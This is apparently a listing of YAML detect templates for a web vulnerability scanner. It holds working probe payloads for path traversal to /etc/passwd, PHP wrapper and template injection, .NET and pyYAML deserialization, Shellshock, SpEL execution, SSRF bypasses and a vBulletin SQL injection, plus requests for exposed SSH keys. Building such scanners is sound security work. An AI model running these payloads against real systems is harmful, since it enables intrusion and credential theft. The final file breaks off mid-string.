Listing 26 | - Insecure Direct Object References 27 | - Broken Access Control 28 | - OWASP 29 | -------------------------------------------------------------------------------- /open-redirect.yaml: -------------------------------------------------------------------------------- 1 | #collect: 2 | # - uniq: 3 | # - [ URI ] 4 | generate: 5 | - payload: 6 | - "//DNS_MARKER" 7 | - "http://DNS_MARKER/" 8 | - method: 9 | - replace 10 | detect: 11 | - response: 12 | - body: "<META[^>]+content=[^>]+DNS_MARKER" 13 | - response: 14 | - body: "<a[^>]+href=[^>]+DNS_MARKER" 15 | - response: 16 | - headers: 17 | - 'Location': DNS_MARKER 18 | meta-info: 19 | - type: redir 20 | - threat: 30 21 | - tags: 22 | - Open Redirect 23 | - Unsafe Redirection # TODO: WASC and OWASP references 24 | -------------------------------------------------------------------------------- /path-traversal-append.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | #LFI 4 | - ../../../../../../../../../etc/passwd 5 | - ../../../../../../../../../etc/passwd%00 6 | - ../../../../../../../../../etc/passwd\u0000 7 | - ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 8 | - ..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd 9 | 10 | - method: 11 | - postfix 12 | 13 | detect: 14 | - response: 15 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 16 | 17 | meta-info: 18 | - type: ptrav 19 | - threat: 80 20 | - tags: 21 | - Path Traversal 22 | - Arbitrary File Reading 23 | - Misconfiguration 24 | - Directory Listing 25 | - Insecure Direct Object References 26 | - Broken Access Control 27 | - OWASP 28 | - OWASP Top-10 29 | - A4:2010 30 | - A4:2013 31 | - A5:2017 32 | - JBOSS 33 | - Wildfly 34 | - CVE-2018-1047 # TODO: more CVE references, it's a common bug. 
Or we need to split between classic and custom vectors 35 | -------------------------------------------------------------------------------- /path-traversal-replace.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - /etc/passwd 4 | - /%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd/ 5 | - /../../../../../../../../../etc/passwd 6 | - /../../../../../../../../../etc/passwd%00 7 | - /../../../../../../../../../etc/passwd\u0000 8 | - "php://filter/convert.base64-encode/resource=../../../../../../../../../../etc/group" 9 | - "php://filter/convert.base64-encode/resource=../../../../../../../../../../etc/group\x00" 10 | - 'file:///etc/passwd' 11 | - 'file:///../../../../../../../../../etc/passwd' 12 | - 'file:///../../../../../../../../../etc/passwd\x00' 13 | - method: 14 | - replace 15 | 16 | detect: 17 | - response: 18 | - body: 'cm9vdDp4OjA6Cm' #part of base64 < /etc/group 19 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 20 | 21 | meta-info: 22 | - type: ptrav 23 | - threat: 80 24 | - tags: 25 | - Path Traversal 26 | - Arbitrary File Reading 27 | - Misconfiguration 28 | - Insecure Direct Object References 29 | - Broken Access Control 30 | - OWASP 31 | - OWASP Top-10 32 | - A4:2010 33 | - A4:2013 34 | - A5:2017 35 | -------------------------------------------------------------------------------- /php-data.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - 'data:,<?php echo CALC_MARKER;' 4 | - 'data:,<?php file_get_contents(''http://DNS_MARKER'');' 5 | - method: 6 | - replace 7 | detect: 8 | - response: 9 | - body: CALC_MARKER 10 | - oob: 11 | - dns 12 | meta-info: 13 | - type: rce 14 | - threat: 80 15 | - tags: 16 | - php 17 | -------------------------------------------------------------------------------- /php-rce.yaml: -------------------------------------------------------------------------------- 1 | 
generate: 2 | - payload: 3 | - '+print(CALC_MARKER);' 4 | - "gethostbyname('DNS_MARKER');" 5 | - method: 6 | - replace 7 | 8 | detect: 9 | - oob: 10 | - dns 11 | - response: 12 | - body: CALC_MARKER 13 | 14 | meta-info: 15 | - type: rce 16 | - threat: 80 17 | - tags: 18 | - php 19 | - php command injection 20 | -------------------------------------------------------------------------------- /php_wrappers.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [ URI ] 4 | generate: 5 | - into: GET 6 | - payload: 7 | - 'expect://ping%20DNS_MARKER%20-c4' 8 | - 'data:text/plain,<?php%20system("cat%20/etc/passwd")?>%20OR%20data:text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKT8+' 9 | - 'ssh2.sftp://user:pass@DNS_MARKER:22/path/to/filename' 10 | - 'http://DNS_MARKER' 11 | - method: 12 | - replace 13 | detect: 14 | - oob: 15 | - dns 16 | - response: 17 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 18 | meta-info: 19 | - type: rce 20 | - threat: 90 21 | - tags: 22 | - RCE 23 | - php 24 | - php-wrappers -------------------------------------------------------------------------------- /phpinfo.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/phpinfo' 4 | 5 | - method: 'GET' 6 | url: '/phpinfo.php' 7 | 8 | - method: 'GET' 9 | url: '/phpinfo.php5' 10 | 11 | - method: 'GET' 12 | url: '/phpinfo.php7' 13 | 14 | - method: 'GET' 15 | url: '/php.php' 16 | 17 | - method: 'GET' 18 | url: '/info.php' 19 | 20 | - method: 'GET' 21 | url: '/info.php5' 22 | 23 | - method: 'GET' 24 | url: '/info.php7' 25 | 26 | detect: 27 | - response: 28 | - body: '<title>phpinfo\(\)<\/title>' 29 | 30 | meta-info: 31 | - type: info 32 | - threat: 30 33 | - applicable_for: 34 | - fast 35 | - tags: 36 | - phpinfo 37 | - Information Exposure -------------------------------------------------------------------------------- 
/public-docker-registry.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/v2/_catalog' 4 | 5 | detect: 6 | - response: 7 | - body: '\{"repositories":\[.*\]' 8 | 9 | meta-info: 10 | - type: info 11 | - threat: 60 12 | - applicable_for: 13 | - fast 14 | - tags: 15 | - Docker Registry 16 | - Misconfiguration 17 | - Broken Access Control -------------------------------------------------------------------------------- /public-jolokia-jmx.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/jolokia/list' 4 | 5 | detect: 6 | - response: 7 | - body: 'java\.lang' 8 | - response: 9 | - body: 'java\.util' 10 | 11 | meta-info: 12 | - type: info 13 | - threat: 60 14 | - applicable_for: 15 | - fast 16 | - tags: 17 | - Misconfiguration 18 | - Directory Listing 19 | - Insecure Direct Object References 20 | - Broken Access Control -------------------------------------------------------------------------------- /pyyaml-deserialization.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - into: "POST_MULTIPART_.*_FILE_value" 3 | - payload: 4 | - "!!python/object/new:eval [CALC_MARKER]" 5 | - "!!python/object/new:exec [import socket; socket.gethostbyname('DNS_MARKER')]" 6 | - method: 7 | - replace 8 | 9 | detect: 10 | - oob: 11 | - dns 12 | - response: 13 | - body: CALC_MARKER 14 | 15 | meta-info: 16 | - type: rce 17 | - threat: 90 18 | - tags: 19 | - pyYAML 20 | - python-deserialization 21 | - CVE-2017-18342 22 | - CVE-2019-20477 23 | -------------------------------------------------------------------------------- /rce-dotnet-jackson.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [ URI ] 4 | generate: 5 | - payload: 6 | - '{ "$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","MethodParameters":{"$type":"System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","$values":["cmd","/cping DNS_MARKER"]},"ObjectInstance":{"$type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}}' 7 | - method: 8 | - replace 9 | detect: 10 | - oob: 11 | - dns 12 | meta-info: 13 | - threat: 95 14 | - type: rce # TODO: tags with CVE, OWASP and WASC references 15 | -------------------------------------------------------------------------------- /remote-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - 'http://wallarm.tools/rfi' 4 | - 'http://wallarm.tools/rfi.php' 5 | - 'http://wallarm.tools/rfi_location.php' 6 | - 'http://wallarm.tools/rfi-html' 7 | - 'http://wallarm.tools/rfi-html.html' 8 | - method: 9 | - replace 10 | 11 | detect: 12 | - response: 13 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 14 | - body: '# campus 284.122.107' 15 | - body: 'WLRM-RFI-TEST' 16 | - body: '<h1>WLRM-TEST-HTML-INCLUDE-777</h1>' 17 | 18 | meta-info: 19 | - type: ptrav 20 | - threat: 80 21 | - tags: 22 | - Path Traversal 23 | - Arbitrary File Reading 24 | - Misconfiguration 25 | - Insecure Direct Object References 26 | - Broken Access Control 27 | - OWASP 28 | - OWASP Top-10 29 | - A4:2010 30 | - A4:2013 31 | - A5:2017 32 | -------------------------------------------------------------------------------- /shellshock.yaml: -------------------------------------------------------------------------------- 1 | #Attention! For this DSL detect you must use a custom test policy with HEADER_* insertion point! 
2 | collect: 3 | - uniq: 4 | - [URI] 5 | 6 | generate: 7 | - into: HEADER_USER-AGENT 8 | - method: 9 | - replace 10 | - payload: 11 | #CVE 2014-6271 12 | - "() { :; }; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH ;bash -c 'getent hosts DNS_MARKER'" 13 | - "() { :; }; echo; echo $((CALC_MARKER))" 14 | #CVE-2014-6278 15 | - "() { _; } >_[$($())] { echo; PATH=/usr/bin:/usr/local/bin:/bin; bash -c 'getent hosts DNS_MARKER'; }" 16 | - "() { _; } >_[$($())] { echo; echo $((CALC_MARKER)); }" 17 | #CVE-2014-7169 18 | - "() { (a)=>' echo -e \"Content-Type: text/plain\n\"; echo $((CALC_MARKER))" 19 | 20 | detect: 21 | - oob: 22 | - dns 23 | - response: 24 | - body: CALC_MARKER 25 | - headers: CALC_MARKER 26 | 27 | 28 | meta-info: 29 | - title: "Bash remote code execution vulnerability (ShellShock, CVE-2014-6271, CVE-2014-6278, CVE-2014-7169)" 30 | - type: "rce" 31 | - threat: 100 32 | - description: "This vulnerability allows remote attackers to execute arbitrary code via a crafted environment" 33 | - tags: 34 | - Bashdoor 35 | - shellshock 36 | - CVE 2014-6271 37 | - CVE-2014-6278 38 | - CVE-2014-7169 39 | -------------------------------------------------------------------------------- /spel-oob.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [URI] 4 | 5 | generate: 6 | - payload: 7 | - "T(java.lang.Runtime).getRuntime().exec('getent hosts DNS_MARKER')/wlrm" 8 | - "new java.lang.ProcessBuilder({'getent hosts DNS_MARKER'}).start()" 9 | 10 | detect: 11 | - oob: 12 | - dns 13 | 14 | meta-info: 15 | - type: rce 16 | - threat: 95 17 | - tags: 18 | - SpEL injection 19 | - Spring 20 | - Spring Framework 21 | - Java 22 | - RCE 23 | - Remote Code Execution 24 | - OWASP Top 10 25 | - OWASP 26 | - CVE-2018-1273 27 | -------------------------------------------------------------------------------- /splunkd-xml-feed.yaml: -------------------------------------------------------------------------------- 1 | send: 
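2 | - method: 'GET' 3 | url: '/' 4 | 5 | detect: 6 | - response: 7 | - body: '<title>splunkd' 8 | 9 | meta-info: 10 | - type: info 11 | - threat: 30 12 | - applicable_for: 13 | - fast 14 | - scanner 15 | - tags: 16 | - Splunkd XML feed 17 | - Infoleak 18 | - Information Exposure -------------------------------------------------------------------------------- /spring-cloud-infoleaks.yaml: --------------------------------------------------------------------------------
# Exposed Spring management endpoint check.
# For each unique URI the ACTION_NAME part is replaced with one of the names
# below (they look like Spring Boot Actuator endpoint names). A finding is
# reported on a Content-Type header matching 'vnd.spring' or on a body
# matching java\.[a-z][a-z].
# Remediation for a confirmed hit: expose only the management endpoints that
# are needed (Spring Boot 2+: management.endpoints.web.exposure.include) and
# require authentication for them.
collect:
  - uniq:
      - [ URI ]
generate:
  - payload:
      - env
      - dump
      - health
      - auditevents
      - beans
      # A second 'auditevents' entry was removed here; it only repeated the
      # same request.
      - conditions
      # Was 'autoconfi', which is not an endpoint name; 'autoconfig' is the
      # Spring Boot 1.x name of the 'conditions' report.
      - autoconfig
      - flyway
      - heapdump
      - info
      - liquibase
      - logfile
      - loggers
      - metrics
      - prometheus
      - scheduledtasks
      - sessions
      - threaddump
      - configprops
  - into: ACTION_NAME
  - method:
      - replace
detect:
  # NOTE(review): whether the two `response` entries are combined with OR or
  # AND is not visible in this file - confirm against the DSL documentation.
  - response:
      - headers:
          - Content-Type: 'vnd.spring'
  - response:
      # NOTE(review): this matches any 'java.' followed by two lowercase
      # letters, so an ordinary error page with a stack trace (java.lang...)
      # would also match; expect false positives if this entry is sufficient
      # on its own.
      - body: java\.[a-z][a-z]
meta-info:
  - type: info
  # NOTE(review): the same threat value is reported for every endpoint, but
  # the exposure differs a lot between e.g. `health` and `env`/`heapdump`;
  # consider splitting the check if the score is used for prioritisation.
  - threat: 80
  - tags:
      - Spring
      - Spring Cloud # TODO: CVE references
      - OWASP Top-10
      - Information Leak
      - Misconfiguration
      - Insecure Direct Object References
      - Broken Access Control
      - OWASP
      # The duplicate 'OWASP Top-10' tag that followed here was removed.
      - A4:2010
      - A4:2013
      - A5:2017
-------------------------------------------------------------------------------- /sqli-error-based.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - '''"\' # '"\ payload to cause any SQL-related crash 4 | - "'\\\"" 5 | - '''"' 6 | - "wlrm'),\");\\'(%c0%67--" 7 | - method: 8 | - postfix 9 | detect: 10 | - response: 11 | - body: 'ERROR:.*LINE [0-9]+' 12 | - body: 'syntax error at' 13 | - body: 'sql error' 14 | - body: 'invalid input syntax for ' 15 | - body: 'unterminated quoted string at' 16 | - body: 'SQL syntax.*?MySQL' 17 | - body: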
'Warning.*?mysql_' 18 | - body: 'valid MySQL result' 19 | - body: 'MySqlClient\.' 20 | - body: 'PostgreSQL.*?ERROR' 21 | - body: 'Warning.*?(pg|PG)_/' 22 | - body: 'valid PostgreSQL result' 23 | - body: 'Npgsql\.' 24 | - body: 'Driver.*?SQL.*?Server' 25 | - body: 'OLE DB.*?SQL Server' 26 | - body: 'SQL Server.*?Driver' 27 | - body: 'Warning.*?mssql_' 28 | - body: 'SQL Server.*?[0-9a-fA-F]{8}' 29 | - body: 'Exception.*?System\.Data\.SqlClient\.' 30 | - body: 'Exception.*?Roadhouse\.Cms\.' 31 | - body: 'Microsoft Access Driver' 32 | - body: 'JET Database Engine' 33 | - body: 'Access Database Engine' 34 | - body: 'ORA-[0-9]{4}' 35 | - body: 'Oracle error' 36 | - body: 'Oracle.*?Driver' 37 | - body: 'Warning.*?(oci|OCI)_' 38 | - body: 'Warning.*?(ora|ORA)_' 39 | - body: 'CLI Driver.*?DB2' 40 | - body: 'DB2 SQL error' 41 | - body: 'SQLite\/JDBCDriver' 42 | - body: 'SQLite.*?Exception' 43 | - body: 'System.*?Data.*?SQLite.*?SQLiteException' 44 | - body: 'Warning.*?sqlite' 45 | - body: 'Warning.*?SQLite3::' 46 | - body: 'SQLITE_ERROR' 47 | - body: 'Warning.*?sybase' 48 | - body: 'Sybase message' 49 | - body: 'Sybase.*?Server message' 50 | - body: 'SybSQLException' 51 | - body: 'com\.sybase\.jdbc' 52 | - body: 'Warning.*?ingres_\.jdbc' 53 | - body: 'Ingres SQLSTATE' 54 | - body: 'Ingres.*?Driver' 55 | - body: 'Exception.*?Transaction rollback' 56 | - body: 'org\.hsqldb\.jdbc' 57 | - body: 'Unexpected end of command in statement' 58 | - body: 'Unexpected token.*?in statement' 59 | - body: 'Query failed: ERROR:' 60 | - body: 'System\.Data\.OleDb\.OleDbException' 61 | - body: 'SQL Server' 62 | - body: '\[Microsoft\]\[ODBC SQL Server Driver\]' 63 | - body: 'SQLServer JDBC Driver' 64 | - body: 'SqlException' 65 | - body: 'System\.Data\.SqlClient\.SqlException' 66 | - body: 'Unclosed quotation mark after the character string' 67 | - body: '''80040e14''' 68 | - body: 'mssql_query\(\)' 69 | - body: 'odbc_exec\(\)' 70 | - body: 'Microsoft OLE DB Provider for ODBC Drivers' 71 | - 
body: 'Microsoft OLE DB Provider for SQL Server' 72 | - body: 'Incorrect syntax near' 73 | - body: 'Sintaxis incorrecta cerca de' 74 | - body: 'Syntax error in string in query expression' 75 | - body: 'ADODB\.Field \(0x800A0BCD\)
' 76 | - body: 'Procedure.*?requires parameter.*?' 77 | - body: 'ADODB\.Recordset' 78 | - body: 'Unclosed quotation mark before the character string' 79 | - body: '''80040e07''' 80 | - body: 'Microsoft SQL Native Client error' 81 | - body: 'SQLCODE' 82 | - body: 'DB2 SQL error:' 83 | - body: 'SQLSTATE' 84 | - body: 'CLI Driver' 85 | - body: '\[DB2\/6000\]' 86 | - body: 'Sybase message:' 87 | - body: 'Sybase Driver' 88 | - body: 'SYBASE' 89 | - body: 'Syntax error in query expression' 90 | - body: 'Data type mismatch in criteria expression' 91 | - body: 'Microsoft JET Database Engine' 92 | - body: '\[Microsoft\]\[ODBC Microsoft Access Driver\]' 93 | - body: '(PLS|ORA)-[0-9][0-9][0-9][0-9]' 94 | - body: 'PostgreSQL query failed:' 95 | - body: 'supplied argument is not a valid PostgreSQL result' 96 | - body: 'pg_query\(\) \[:' 97 | - body: 'pg_exec\(\) \[:' 98 | - body: 'supplied argument is not a valid MySQL' 99 | - body: 'Column count doesn''t match value count at row' 100 | - body: 'mysql_fetch_array\(\)' 101 | - body: 'mysql_' 102 | - body: 'on MySQL result index' 103 | - body: 'You have an error in your SQL syntax;' 104 | - body: 'You have an error in your SQL syntax near' 105 | - body: 'MySQL server version for the right syntax to use' 106 | - body: '\[MySQL\]\[ODBC' 107 | - body: 'Column count doesn''t match' 108 | - body: 'the used select statements have different number of columns' 109 | - body: 'Table.*?doesn''t exist' 110 | - body: 'DBD::mysql::st execute failed' 111 | - body: 'DBD::mysql::db do failed' 112 | - body: 'com\.informix\.jdbc' 113 | - body: 'Dynamic Page Generation Error' 114 | - body: 'An illegal character has been found in the statement' 115 | - body: 'Informix' 116 | - body: 'DM_QUERY_E_SYNTAX' 117 | - body: 'has occurred in the vicinity of' 118 | - body: 'A Parser Error \(syntax error\)' 119 | - body: 'java\.sql\.SQLException' 120 | - body: 'Unexpected end of command in statement' 121 | - body: '\[Macromedia\]\[SQLServer JDBC Driver\]' 122 | 
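- body: 'UPDATE .*? SET .*?' 123 | - body: 'INSERT INTO .*?' 124 | - body: 'Unknown column' 125 | - body: 'ERROR:\s*operator is not unique' 126 | - body: 'no such function' 127 | meta-info: 128 | - type: sqli 129 | - threat: 90 130 |
--------------------------------------------------------------------------------
/ssh-keys.yaml:
--------------------------------------------------------------------------------
# Checks whether SSH key material is served by the web server: requests a
# fixed list of key file names and .ssh/ paths, then inspects each response
# body for the key markers listed under detect.
# A hit means a key file is web-readable: take it out of the served
# directory and rotate the affected key pair.
send:
  - method: 'GET'
    url: '.ssh'

  - method: 'GET'
    url: '.ssh.asp'

  - method: 'GET'
    url: '.ssh.php'

  - method: 'GET'
    url: '.ssh/id_dsa'

  - method: 'GET'
    url: '.ssh/id_rsa'

  - method: 'GET'
    url: '.ssh/id_rsa.key'

  - method: 'GET'
    url: '.ssh/id_rsa.key~'

  - method: 'GET'
    url: '.ssh/id_rsa.priv'

  - method: 'GET'
    url: '.ssh/id_rsa.priv~'

  - method: 'GET'
    url: '.ssh/id_rsa.pub'

  - method: 'GET'
    url: '.ssh/id_rsa.pub~'

  - method: 'GET'
    url: '.ssh/id_rsa~'

  - method: 'GET'
    url: 'id_dsa'

  - method: 'GET'
    url: 'id_dsa.ppk'

  - method: 'GET'
    url: 'id_rsa'

  - method: 'GET'
    url: 'id_rsa.pub'

detect:
  - response:
      # PEM headers of private and public key files.
      - body: '-----BEGIN RSA PRIVATE KEY-----'
      - body: '-----BEGIN ENCRYPTED PRIVATE KEY-----'
      # Recent OpenSSH releases write private keys under this header by
      # default, whatever the algorithm; without it such keys go unreported.
      - body: '-----BEGIN OPENSSH PRIVATE KEY-----'
      - body: '-----BEGIN PUBLIC KEY-----'
      - body: '-----BEGIN DSA PRIVATE KEY-----'
      # OpenSSH public-key type prefixes. The type name for DSA keys is
      # 'ssh-dss'; 'ssh-dsa' is not a key type and never appears in a key file.
      # NOTE(review): these are bare substrings, so a page that merely mentions
      # ssh-rsa would also match - confirm hits before reporting.
      - body: 'ssh-rsa'
      - body: 'ssh-dss'

meta-info:
  - type: info
  - threat: 30
  - applicable_for:
      - fast
      - scanner
  - tags:
      - Information Exposure
      - ssh authorized_keys
--------------------------------------------------------------------------------
/ssrf-rechecker-lfi.yaml:
--------------------------------------------------------------------------------
 1 | generate: 2 | - payload: 3 | - 'netdoc:///etc/passwd' 4 | - 'file:///etc/passwd' 5 | - 'file://c:\windows\system32\drivers\etc\networks' 6 | - 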
method: 7 | - replace 8 | detect: 9 | - response: 10 | - body: '# campus 284.122.107' 11 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 12 | meta-info: 13 | - type: rce 14 | - threat: 70 15 | - title: "Server Side Request Forgery (SSRF)" 16 | - description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)." 17 | - applicable_for: ["attack_rechecker"] 18 | - tags: 19 | - SSRF 20 | - Server Side Request Forgery 21 | - CWE-918 22 | -------------------------------------------------------------------------------- /ssrf-rechecker-oob.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - 'DNS_MARKER' 4 | - 'http://DNS_MARKER/' 5 | - 'http://DNS_MARKER &@2.2.2.2# @3.3.3.3/' 6 | - 'http://1.1.1.1 &@DNS_MARKER# @3.3.3.3/' 7 | - 'http://1.1.1.1 &@2.2.2.2# @DNS_MARKER/' 8 | - 'http://127.1.1.1:80\@DNS_MARKER:80/' 9 | - 'http://127.1.1.1:80\@@DNS_MARKER:80/' 10 | - 'http://127.1.1.1:80:\@@DNS_MARKER:80/' 11 | - 'http://127.1.1.1:80#\@DNS_MARKER:80/' 12 | - 'jar:http://DNS_MARKER!/' 13 | - 'dict://DNS_MARKER:11111/' 14 | - 'sftp://DNS_MARKER:8022/' 15 | - 'tftp://DNS_MARKER:69/somefile' 16 | - 'ldap://DNS_MARKER:389/%0astats%0aquit' 17 | - 'gopher://DNS_MARKER:70/' 18 | - method: 19 | - replace 20 | detect: 21 | - oob: 22 | - dns 23 | meta-info: 24 | - type: rce 25 | - threat: 70 26 | - title: "Server Side Request Forgery (SSRF)" 27 | - description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. 
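The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)." 28 | - applicable_for: ["attack_rechecker"] 29 | - tags: 30 | - SSRF 31 | - Server Side Request Forgery 32 | - CWE-918 33 |
--------------------------------------------------------------------------------
/ssrf.yaml:
--------------------------------------------------------------------------------
# SSRF check: each payload replaces the tested value (method: replace) and the
# detect relies on an out-of-band DNS lookup for the marker host (oob: dns).
generate:
  - payload:
      - "DNS_MARKER" # like ?link=r4nd0m.wlrm.tl
      - "http://DNS_MARKER/"
  - method:
      - replace
detect:
  - oob:
      - dns
meta-info:
  - type: ssrf
  - threat: 70
  - tags:
      - SSRF
      - Server Side Request Forgery
      - Link Injection
      - CWE-918 # same CWE tag the ssrf-rechecker detects carry; TODO: OWASP reference
--------------------------------------------------------------------------------
/ssti.yaml:
--------------------------------------------------------------------------------
# Template-injection check: a single string carrying CALC_MARKER in several
# template syntaxes is appended to the tested value (method: postfix), and the
# detect looks for CALC_MARKER in the response body.
# NOTE(review): presumably the engine substitutes an arithmetic expression for
# CALC_MARKER in the payload and its computed result in the detect - confirm
# against the DSL reference.
generate:
  - payload:
      - ${CALC_MARKER}{php}echo CALC_MARKER;{/php}{{CALC_MARKER}}${{CALC_MARKER}}<%= CALC_MARKER %>
  - method:
      - postfix
detect:
  - response:
      - body: CALC_MARKER
meta-info:
  - type: ssti
  - threat: 95
  - tags:
      - OS Commanding
      - RCE
      - Remote Code Execution
      - Template Injection
      - Server Side Template Injection
      - OWASP Top 10
      - OWASP # TODO: CWE and WASC references
--------------------------------------------------------------------------------
/stored-xss-oob.yaml:
--------------------------------------------------------------------------------
# Stored-XSS recheck: payloads are appended to the tested value (method:
# postfix) and the detect waits for a delayed out-of-band DNS hit.
# NOTE(review): as shown, neither payload contains DNS_MARKER or any markup,
# so nothing here could trigger the delayed_oob dns check. The markup was
# probably stripped when this page was rendered - restore the payloads from
# the original file before relying on this detect.
generate:
  - payload:
      - "><"
      - ">"
  - method:
      - postfix
detect:
  - delayed_oob:
      - dns
meta-info:
  - applicable_for:
      - attack_rechecker
  - threat: 70
  - type: xss
--------------------------------------------------------------------------------
/telerik-infoleaks.yaml: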
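--------------------------------------------------------------------------------
# Requests the Telerik dialog handler's self-check URL and inspects the
# response body for the handler's OK string and for a Telerik.Web.UI build
# number from the list below (this detect is tagged CVE-2017-9248).
# A match indicates a reachable handler on a listed build: update the Telerik
# UI assembly and restrict access to the handler.
send:
  - method: 'GET'
    url: '/Telerik.Web.UI.DialogHandler.aspx?checkHandler=true'

detect:
  - response:
      - body: 'HandlerCheckOK'
      # NOTE(review): every '.' in this pattern is unescaped and so matches any
      # character, and the group is not terminated after the build number
      # (2012.1.215 also matches 2012.1.2150). Escape the dots and add a
      # terminator if false positives show up.
      - body: 'Telerik.Web.UI.WebResource.*Version=(2007.1423|2007.1521|2007.1626|2007.2918|2007.21010|2007.21107|2007.31218|2007.31314|2007.31425|2008.1415|2008.1515|2008.1619|2008.2723|2008.2826|2008.21001|2008.31105|2008.31125|2008.31314|2009.1311|2009.1402|2009.1527|2009.2701|2009.2826|2009.31103|2009.31208|2009.31314|2010.1309|2010.1415|2010.1519|2010.2713|2010.2826|2010.2929|2010.31109|2010.31215|2010.31317|2011.1315|2011.1413|2011.1519|2011.2712|2011.2915|2011.31115|2011.3.1305|2012.1.215|2012.1.411|2012.2.607|2012.2.724|2012.2.912|2012.3.1016|2012.3.1205|2012.3.1308|2013.1.220|2013.1.403|2013.1.417|2013.2.611|2013.2.717|2013.3.1015|2013.3.1114|2013.3.1324|2014.1.225|2014.1.403|2014.2.618|2014.2.724|2014.3.1024|2015.1.204|2015.1.225|2015.1.401|2015.2.604|2015.2.623|2015.2.729|2015.2.826|2015.3.930|2015.3.1111|2016.1.113|2016.1.225|2016.2.504|2016.2.607|2016.3.914|2016.3.1018|2016.3.1027|2017.1.118|2017.1.228|2017.2.503|2017.2.621|2017.2.711|2017.3.913)'

meta-info:
  - type: info
  - threat: 67
  - applicable_for:
      - fast
  - tags:
      - Telerik Web UI
      - Possible RCE
      - Access to Document Management
      - CVE-2017-9248
      - Telerik Web ASP
      - OWASP Top 10
      - OWASP
--------------------------------------------------------------------------------
/vBulletin_CVE-2020-12720.yaml:
--------------------------------------------------------------------------------
 1 | send: 2 | - method: 'POST' 3 | url: '/ajax/api/content_infraction/getIndexableContent' 4 | headers: 5 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8 6 | - X-REQUESTED-WITH: XMLHttpRequest 7 | body: 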
"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--" 8 | 9 | - method: 'POST' 10 | url: '/forum/ajax/api/content_infraction/getIndexableContent' 11 | headers: 12 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8 13 | - X-REQUESTED-WITH: XMLHttpRequest 14 | body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--" 15 | 16 | - method: 'POST' 17 | url: '/forums/ajax/api/content_infraction/getIndexableContent' 18 | headers: 19 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8 20 | - X-REQUESTED-WITH: XMLHttpRequest 21 | body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--" 22 | 23 | - method: 'POST' 24 | url: '/' 25 | headers: 26 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8 27 | - X-REQUESTED-WITH: XMLHttpRequest 28 | body: "routestring=ajax/api/content_infraction/getIndexableContent&nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--" 29 | 30 | detect: 31 | - response: 32 | - body: 'wlrm-sqli-check-jxshw' 33 | 34 | meta-info: 35 | - type: sqli 36 | - threat: 98 37 | - applicable_for: 38 | - fast 39 | - scanner 40 | - title: "SQL injection in vBulletin (CVE-2020-12720)" 41 | - description: "Improper access control for the 'nodeId' parameter allows attackers to execute arbitrary SQL commands. A successful exploitation of SQLi could result in reading sensitive data from the database, modifying this data, and in some cases even execution of arbitrary commands in the OS. 
